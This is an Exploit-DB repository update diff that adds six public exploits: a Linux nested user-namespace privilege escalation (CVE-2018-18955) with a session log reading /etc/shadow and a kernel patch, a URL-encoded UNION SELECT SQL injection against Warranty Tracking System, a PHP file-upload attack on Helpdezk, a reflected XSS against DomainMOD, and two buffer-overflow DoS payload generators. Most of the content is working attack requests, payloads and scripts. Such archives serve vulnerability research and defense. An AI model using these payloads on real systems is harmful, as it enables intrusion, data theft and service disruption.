DB: 2018-11-17

6 changes to exploits/shellcodes

Mumsoft Easy Software 2.0 - Denial of Service (PoC)
Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)

Linux - Broken uid/gid Mapping for Nested User Namespaces

Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting
Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection
Helpdezk 1.1.1 - Arbitrary File Upload
DomainMOD 4.11.01 - Cross-Site Scripting

exploits/linux/local/45886.txt

@@ -0,0 +1,177 @@
+commit 6397fac4915a ("userns: bump idmap limits to 340") increases the number of
+possible uid/gid mappings that a namespace can have from 5 to 340. This is
+implemented by switching to a different data structure if the number of mappings
+exceeds 5: Instead of linear search over an unsorted array of struct
+uid_gid_extent, binary search over a sorted array of struct uid_gid_extent is
+used. Because ID mappings are queried in both directions (kernel ID to
+namespaced ID and namespaced ID to kernel ID), two copies of the array are
+created, one per direction, and they are sorted differently.
+
+In map_write(), at first, during the loop that calls insert_extent(), the member
+lower_first of each struct uid_gid_extent contains an ID in the parent
+namespace. Later, map_id_range_down() is used in a loop to replace these IDs in
+the parent namespace with kernel IDs.
+
+The problem is that, when the two sorted arrays are used, the new code omits the
+ID transformation for the kernel->namespaced mapping; only the
+namespaced->kernel mapping is transformed appropriately.
+
+This means that if you first, from the init namespace, create a user namespace
+NS1 with the following uid_map:
+
+    0 100000 1000
+
+and then, from NS1, create a nested user namespace NS2 with the following
+uid_map:
+
+    0 0 1
+    1 1 1
+    2 2 1
+    3 3 1
+    4 4 1
+    5 5 995
+
+then make_kuid(NS2, ...) will work properly, but from_kuid(NS2) will be an
+identity mapping for UIDs in the range 0..1000.
+
+Most users of from_kuid() are relatively boring, but kuid_has_mapping() is used
+in inode_owner_or_capable() and privileged_wrt_inode_uidgid(); so you can abuse
+this to gain the ability to override DAC security controls on files whose IDs
+aren't mapped in your namespace.
+
+
+To test this, I installed the "uidmap" package in a Ubuntu 18.04 VM with the
+following /etc/subuid and /etc/subgid:
+
+user@ubuntu-18-04-vm:~$ cat /etc/subuid
+user:100000:65536
+user2:165536:65536
+user3:231072:65536
+user@ubuntu-18-04-vm:~$ cat /etc/subgid
+user:100000:65536
+user2:165536:65536
+user3:231072:65536
+user@ubuntu-18-04-vm:~$
+
+
+Then, as the user "user", I compiled the two attached helpers (subuid_shell.c
+and subshell.c):
+
+user@ubuntu-18-04-vm:~/userns_4_15$ gcc -o subuid_shell subuid_shell.c
+user@ubuntu-18-04-vm:~/userns_4_15$ gcc -o subshell subshell.c
+
+subuid_shell.c uses the newuidmap helper to set up a namespace that maps 1000
+UIDs starting at 100000 to the namespaced UID 0; subshell.c requires namespaced
+CAP_SYS_ADMIN and creates a user namespace that maps UIDs 0-999, using six
+extents.
+
+I used them as follows to read /etc/shadow:
+
+user@ubuntu-18-04-vm:~/userns_4_15$ id
+uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
+user@ubuntu-18-04-vm:~/userns_4_15$ ls -l /etc/shadow
+-rw-r----- 1 root shadow 1519 Jul  4 16:11 /etc/shadow
+user@ubuntu-18-04-vm:~/userns_4_15$ head -n1 /etc/shadow
+head: cannot open '/etc/shadow' for reading: Permission denied
+user@ubuntu-18-04-vm:~/userns_4_15$ ./subuid_shell 
+root@ubuntu-18-04-vm:~/userns_4_15# id
+uid=0(root) gid=0(root) groups=0(root),65534(nogroup)
+root@ubuntu-18-04-vm:~/userns_4_15# cat /proc/self/uid_map
+         0     100000       1000
+root@ubuntu-18-04-vm:~/userns_4_15# ls -l /etc/shadow
+-rw-r----- 1 nobody nogroup 1519 Jul  4 16:11 /etc/shadow
+root@ubuntu-18-04-vm:~/userns_4_15# head -n1 /etc/shadow
+head: cannot open '/etc/shadow' for reading: Permission denied
+root@ubuntu-18-04-vm:~/userns_4_15# ./subshell 
+nobody@ubuntu-18-04-vm:~/userns_4_15$ id
+uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare)
+nobody@ubuntu-18-04-vm:~/userns_4_15$ cat /proc/self/uid_map
+         0          0          1
+         1          1          1
+         2          2          1
+         3          3          1
+         4          4          1
+         5          5        995
+nobody@ubuntu-18-04-vm:~/userns_4_15$ ls -l /etc/shadow
+-rw-r----- 1 root shadow 1519 Jul  4 16:11 /etc/shadow
+nobody@ubuntu-18-04-vm:~/userns_4_15$ head -n1 /etc/shadow
+root:!:17696:0:99999:7:::
+nobody@ubuntu-18-04-vm:~/userns_4_15$ 
+
+
+Here is a suggested patch (copy attached to avoid whitespace issues); does this
+look sensible?
+
+==================
+From 20598025d5e80f26a0c4306ebeca14b31539bd97 Mon Sep 17 00:00:00 2001
+From: Jann Horn <jannh@google.com>
+Date: Mon, 5 Nov 2018 20:55:09 +0100
+Subject: [PATCH] userns: also map extents in the reverse map to kernel IDs
+
+The current logic first clones the extent array and sorts both copies, then
+maps the lower IDs of the forward mapping into the lower namespace, but
+doesn't map the lower IDs of the reverse mapping.
+
+This means that code in a nested user namespace with >5 extents will see
+incorrect IDs. It also breaks some access checks, like
+inode_owner_or_capable() and privileged_wrt_inode_uidgid(), so a process
+can incorrectly appear to be capable relative to an inode.
+
+To fix it, we have to make sure that the "lower_first" members of extents
+in both arrays are translated; and we have to make sure that the reverse
+map is sorted *after* the translation (since otherwise the translation can
+break the sorting).
+
+This is CVE-2018-18955.
+
+Fixes: 6397fac4915a ("userns: bump idmap limits to 340")
+Cc: stable@vger.kernel.org
+Signed-off-by: Jann Horn <jannh@google.com>
+---
+ kernel/user_namespace.c | 12 ++++++++----
+ 1 file changed, 8 insertions(+), 4 deletions(-)
+
+diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c
+index e5222b5fb4fe..923414a246e9 100644
+--- a/kernel/user_namespace.c
++++ b/kernel/user_namespace.c
+@@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf,
+        if (!new_idmap_permitted(file, ns, cap_setid, &new_map))
+                goto out;
+ 
+-       ret = sort_idmaps(&new_map);
+-       if (ret < 0)
+-               goto out;
+-
+        ret = -EPERM;
+        /* Map the lower ids from the parent user namespace to the
+         * kernel global id space.
+@@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf,
+                e->lower_first = lower_first;
+        }
+ 
++       /*
++        * If we want to use binary search for lookup, this clones the extent
++        * array and sorts both copies.
++        */
++       ret = sort_idmaps(&new_map);
++       if (ret < 0)
++               goto out;
++
+        /* Install the map */
+        if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) {
+                memcpy(map->extent, new_map.extent,
+-- 
+2.19.1.930.g4563a0d9d0-goog
+==================
+
+
+(By the way: map_id_up_max() is probably pretty inefficient, especially when
+retpoline mitigations are on, because it uses bsearch(), which is basically a
+little bit of logic glue around indirect function calls. If you care about
+speed, you might want to add an inline variant of bsearch() for places like
+this.)
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45886.zip

exploits/php/webapps/45881.txt

@@ -0,0 +1,109 @@
+# Exploit Title: Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection
+# Dork: N/A
+# Date: 2018-11-14
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://warrantytrack.org/
+# Software Link: https://kent.dl.sourceforge.net/project/warrantytrack/warrantytrack%20Rel.11.06.3.zip
+# Version: 11.06.3
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# //[PATH]//Customer//SearchCustomer.php
+# ....
+#83 $strSQL = "SELECT * FROM tblCustomers WHERE 1=1 ";
+#84 if ( strlen($_POST["txtCustomerCode"])>0 )
+#85 	$strSQL .= " And cCuctomerID Like '%" . $_POST["txtCustomerCode"] . "%'";
+#86 	
+#87 if ( strlen($_POST["txtCustomerName"])>0 )
+#88 	$strSQL .= " And cName Like '%" . $_POST["txtCustomerName"] . "%'";
+#89 
+#90 if ( strlen($_POST["txtPhone"])>0 )
+#91 	$strSQL .= " And cPhone Like '%" . $_POST["txtPhone"] . "%'";
+#92 
+#93 $Result = mysql_query($strSQL);
+#94 
+#95 while($Field_Customer = mysql_fetch_array($Result))
+#96 	{
+# ....
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/SearchCustomer.php?pDivAlert=NoCustomer
+# 
+POST /PATH/customer/SearchCustomer.php?pDivAlert=NoCustomer HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=909k34togduf8v49mibgj6cpp5
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 244
+txtCustomerCode=%27%20%55%6e%69%4f%6e%20%53%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d
+HTTP/1.1 200 OK
+Date: Wed, 14 Nov 2018 06:03:04 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 4245
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2) 
+# http://localhost/[PATH]/SearchCustomer.php?pDivAlert=NoCustomer
+# 
+POST /PATH/customer/SearchCustomer.php?pDivAlert=NoCustomer HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=909k34togduf8v49mibgj6cpp5
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 244
+txtCustomerName=%27%20%55%6e%69%4f%6e%20%53%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d
+HTTP/1.1 200 OK
+Date: Wed, 14 Nov 2018 06:05:13 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 4245
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 3) 
+# http://localhost/[PATH]/SearchCustomer.php?pDivAlert=NoCustomer
+# 
+POST /PATH/customer/SearchCustomer.php?pDivAlert=NoCustomer HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=909k34togduf8v49mibgj6cpp5
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 237
+txtPhone=%27%20%55%6e%69%4f%6e%20%53%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2d%2d%20%2d
+HTTP/1.1 200 OK
+Date: Wed, 14 Nov 2018 06:06:25 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 4252
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8

exploits/php/webapps/45882.txt

@@ -0,0 +1,93 @@
+# Exploit Title: Helpdezk 1.1.1 - Arbitrary File Upload
+# Dork: N/A
+# Date: 2018-11-13
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: http://www.helpdezk.org/
+# Software Link: https://netcologne.dl.sourceforge.net/project/helpdezk/helpdezk-1.1.1.zip
+# Version: 1.1.1
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1) 
+# http://localhost/[PATH]/helpdezk/manageattachments/
+# 
+
+# Vulnerability found in more than one file.
+##Log S1##
+//PATH//app//modules//admin//views//upload.php
+//PATH//app//modules//admin//views//upload2.php
+//PATH//app//modules//admin//views//upload3.php
+//PATH//app//modules//admin//views//upload_dsh_image.php
+//PATH//app//modules//admin//views//upload_file.php
+//PATH//app//modules//admin//views//upload_icon.php
+//PATH//app//modules//helpdezk//views//manage_attachments.php
+//PATH//app//modules//helpdezk//views//manage_icons.php
+//PATH//app//modules//helpdezk//views//upload_file_knowledgebase.php
+
+POST /[PATH]/helpdezk/manageattachments/ HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: keep-alive
+Content-Type: multipart/form-data; boundary=
+---------------------------1293691802011755498543585049
+Content-Length: 374
+-----------------------------1293691802011755498543585049
+Content-Disposition: form-data; name="file"; filename="phpinfo.php"
+Content-Type: application/force-download
+<?php
+phpinfo();
+?>
+-----------------------------1293691802011755498543585049
+Content-Disposition: form-data; name="Submit"
+Ver Ayari
+-----------------------------1293691802011755498543585049--
+HTTP/1.1 200 OK
+Date: Tue, 13 Nov 2018 19:10:01 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Set-Cookie: PHPSESSID=0qlddpbl1nbpmcaegppm73brg1; path=/
+Expires: Thu, 19 Nov 1981 08:52:00 GMT
+Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
+Pragma: no-cache
+Content-Length: 2771
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Content-Type: text/html; charset=UTF-8
+
+#
+GET /[PATH]/app/uploads/helpdezk/attachments/4.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Cookie: PHPSESSID=0qlddpbl1nbpmcaegppm73brg1
+Connection: keep-alive
+HTTP/1.1 200 OK
+Date: Tue, 13 Nov 2018 19:10:29 GMT
+Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
+X-Powered-By: PHP/5.6.30
+Keep-Alive: timeout=5, max=100
+Connection: Keep-Alive
+Transfer-Encoding: chunked
+Content-Type: text/html; charset=UTF-8
+
+# POC: 
+# 2)
+# http://localhost/[PATH]/helpdezk/manageattachments/
+# 
+# http://localhost/[PATH]/app/uploads/helpdezk/attachments/[NUMBER].php
+# 
+<html>
+<body>
+<form action="http://localhost/[PATH]/helpdezk/manageattachments/" method="post" enctype="multipart/form-data" name="formAt">    
+<input name="file" type="file">    
+<input type="submit" name="Submit" value="Ver Ayari">
+</form>
+</body>
+</html>

exploits/php/webapps/45883.txt

@@ -0,0 +1,15 @@
+# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
+# Date: 2018-11-09
+# Exploit Author: Dawood Ansar
+# Vendor Homepage: domainmod (https://domainmod.org/)
+# Software Link: domainmod (https://github.com/domainmod/domainmod)
+# Version: v4.09.03 to v4.11.01
+# CVE : CVE-2018-19136
+
+# A Reflected Cross-site scripting (XSS) was discovered in DomainMod application 
+# versions from v4.09.03 to v4.11.01（https://github.com/domainmod/domainmod/issues/79）
+# After logging into the Domainmod application panel, browse to the assets/edit/register-account.php 
+# page and inject a javascript XSS payload in raid parameter
+
+# POC: 
+http://127.0.0.1/assets/edit/registrar-account.php?raid=hello%22%3E%3Cscript%3Ealert("XSS")%3C%2Fscript%3E&del=1

exploits/windows_x86-64/dos/45884.py

@@ -0,0 +1,42 @@
+# Exploit Title: Mumsoft Easy Software 2.0 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-15
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.munsoft.com/EasyRARRecovery/
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyRARRecovery/download/EasyRARRecovery-2.0-Setup.exe
+# Other Affected software:
+# Easy Archive Recovery 2.0
+# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyArchiveRecovery/download/EasyArchiveRecovery-2.0-Setup.exe
+# Easy ZIP Recovery 2.0
+# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyZIPRecovery/download/EasyZIPRecovery-2.0-Setup.exe
+# Easy Access Recovery 2.0
+# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyAccessRecovery/download/EasyAccessRecovery-2.0-Setup.exe
+# Easy PowerPoint Recovery 2.0
+# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyPowerPointRecovery/download/EasyPowerPointRecovery-2.0-Setup.exe
+# Easy Excel Recovery 2.0
+# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyExcelRecovery/download/EasyExcelRecovery-2.0-Setup.exe
+# Easy Word Recovery 2.0
+# https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyWordRecovery/download/EasyWordRecovery-2.0-Setup.exe
+
+# Version: 2.0
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Help / Enter a registration key...
+
+#!/usr/bin/python
+    
+buffer = "A" * 256
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."

exploits/windows_x86-64/dos/45885.txt

@@ -0,0 +1,46 @@
+# Exploit Title: Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)
+# Dork: N/A
+# Date: 2018-11-15
+# Exploit Author: Ihsan Sencan
+# Vendor Homepage: https://www.munsoft.com/EasyOutlookExpressRecovery/
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyOutlookExpressRecovery/download/EasyOutlookExpressRecovery-2.0-Setup.exe
+# Version: 2.0
+# Other Affectted Software:
+# Easy Outlook Recovery 2.0
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyOutlookRecovery/download/EasyOutlookRecovery-2.0-Setup.exe
+# Easy Mail Recovery 2.0
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyMailRecovery/download/EasyMailRecovery-2.0-Setup.exe
+# Easy Office Recovery 2.0
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyOfficeRecovery/download/EasyOfficeRecovery-2.0-Setup.exe
+# Easy File Undelete 3.0
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyFileUndelete/download/EasyFileUndelete-3.0-Setup.exe
+# Easy NTFS Data Recovery 3.0
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyNTFSDataRecovery/download/EasyNTFSDataRecovery-3.0-Setup.exe
+# Easy FAT Data Recovery 3.0
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyFATDataRecovery/download/EasyFATDataRecovery-3.0-Setup.exe
+# Easy Drive Data Recovery 3.0
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyDriveDataRecovery/download/EasyDriveDataRecovery-3.0-Setup.exe
+# Easy Digital Photo Recovery 3.0
+# Software Link: https://s3.eu-central-1.amazonaws.com/munsoft-com-de/EasyDigitalPhotoRecovery/download/EasyDigitalPhotoRecovery-3.0-Setup.exe
+
+# Category: Dos
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+
+# POC: 
+# 1)
+# Help / Enter a registration key...
+
+#!/usr/bin/python
+    
+buffer = "A" * 260
+ 
+payload = buffer
+try:
+    f=open("exp.txt","w")
+    print "[+] Creating %s bytes evil payload." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created."

files_exploits.csv

@@ -6191,6 +6191,8 @@ id,file,description,date,author,type,platform,port
 45850,exploits/windows_x86-64/dos/45850.py,"AMPPS 2.7 - Denial of Service (PoC)",2018-11-14,"Ihsan Sencan",dos,windows_x86-64,
 45859,exploits/windows/dos/45859.py,"Bosch Video Management System 8.0 - Configuration Client Denial of Service (PoC)",2018-11-14,Daniel,dos,windows,
 45869,exploits/windows_x86-64/dos/45869.py,"Notepad3 1.0.2.350 - Denial of Service (PoC)",2018-11-15,"Ihsan Sencan",dos,windows_x86-64,
+45884,exploits/windows_x86-64/dos/45884.py,"Mumsoft Easy Software 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
+45885,exploits/windows_x86-64/dos/45885.txt,"Easy Outlook Express Recovery 2.0 - Denial of Service (PoC)",2018-11-16,"Ihsan Sencan",dos,windows_x86-64,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10107,6 +10109,7 @@ id,file,description,date,author,type,platform,port
 45865,exploits/linux/local/45865.php,"PHP 5.2.3 imap (Debian Based) - 'imap_open' Disable Functions Bypass",2018-11-14,"Anton Lopanitsyn",local,linux,
 45866,exploits/multiple/local/45866.html,"Webkit (Safari) - Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
 45867,exploits/multiple/local/45867.txt,"Webkit (Chome < 61) - 'MHTML' Universal Cross-site Scripting",2017-10-03,"Anton Lopanitsyn",local,multiple,
+45886,exploits/linux/local/45886.txt,"Linux - Broken uid/gid Mapping for Nested User Namespaces",2018-11-16,"Google Security Research",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -40382,4 +40385,7 @@ id,file,description,date,author,type,platform,port
 45877,exploits/php/webapps/45877.txt,"Simple E-Document 1.31 - 'username' SQL Injection",2018-11-15,"Ihsan Sencan",webapps,php,
 45878,exploits/php/webapps/45878.txt,"2-Plan Team 1.0.4 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
 45879,exploits/php/webapps/45879.txt,"PHP Mass Mail 1.0 - Arbitrary File Upload",2018-11-15,"Ihsan Sencan",webapps,php,
-45880,exploits/php/webapps/45880.txt,"Wordpress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,
+45880,exploits/php/webapps/45880.txt,"WordPress Plugin Ninja Forms 3.3.17 - Cross-Site Scripting",2018-11-15,MTK,webapps,php,
+45881,exploits/php/webapps/45881.txt,"Warranty Tracking System 11.06.3 - 'txtCustomerCode' SQL Injection",2018-11-16,"Ihsan Sencan",webapps,php,
+45882,exploits/php/webapps/45882.txt,"Helpdezk 1.1.1 - Arbitrary File Upload",2018-11-16,"Ihsan Sencan",webapps,php,
+45883,exploits/php/webapps/45883.txt,"DomainMOD 4.11.01 - Cross-Site Scripting",2018-11-16,"Dawood Ansar",webapps,php,